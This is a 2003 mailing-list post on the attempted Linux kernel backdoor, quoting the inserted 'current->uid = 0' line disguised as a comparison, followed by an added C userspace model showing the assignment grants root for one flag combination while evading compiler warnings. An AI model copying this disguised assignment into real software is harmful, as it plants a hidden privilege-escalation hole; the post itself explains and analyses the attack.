Linux security: mixing assignment with expression

Dave Benjamin ramen at lackingtalent.com
Wed Nov 12 15:27:14 EST 2003


Hey folks,

I was just reading about the attempt to insert a backdoor into the Linux
kernel. You can read the details here:

    http://kerneltrap.org/node/view/1584

This is the code that the attacker inserted:

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
        
Notice the "current->uid = 0" expression? I think it's pretty clear that the
intent was to confuse the reader, to make the above code appear like it's
doing a comparison, when actually it is assigning 0 to the user ID (0 being
the root user).

In this case, the ability to mix assignment with expression in C not only
affected readability but--as a result--security. I think this clearly lends
credibility to Guido's design decision to deliberately prevent this sort of
"mistake".

-- 
.:[ dave benjamin (ramenboy) -:- www.ramenfest.com -:- www.3dex.com ]:.
: d r i n k i n g   l i f e   o u t   o f   t h e   c o n t a i n e r :
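
The behaviour of the quoted condition, as an added example that is not part of the original post and not kernel code: a userspace model showing that the assignment runs only when the flag test matches and that `retval` is never set. `struct task`, the flag values and the helper functions are constructed stand-ins.

```c
#include <errno.h>
#include <stdio.h>

/* Constructed userspace stand-ins for the kernel names in the quoted line. */
#define __WALL   0x40000000u
#define __WCLONE 0x80000000u
struct task { unsigned int uid; };

/* The condition as quoted: '=' stores 0 in uid, and the stored value (0) is
 * false, so retval is never set and the caller sees no error.
 * The parentheses around the assignment also keep GCC's -Wparentheses quiet. */
static int check_as_inserted(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE | __WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What the line looks like at a glance: a comparison with no side effect. */
static int check_as_comparison(const struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE | __WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* uid of a task that started as uid 1000, after the given check has run. */
static unsigned int uid_after(int inserted, unsigned int options)
{
    struct task t = { 1000 };
    if (inserted)
        check_as_inserted(&t, options);
    else
        check_as_comparison(&t, options);
    return t.uid;
}

int main(void)
{
    printf("inserted,   __WALL only:     uid=%u\n", uid_after(1, __WALL));
    printf("inserted,   __WCLONE|__WALL: uid=%u\n", uid_after(1, __WCLONE | __WALL));
    printf("comparison, __WCLONE|__WALL: uid=%u\n", uid_after(0, __WCLONE | __WALL));
    return 0;
}
```

Because `&&` short-circuits, the store is reached only for that one flag combination, so ordinary callers never exercise it.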



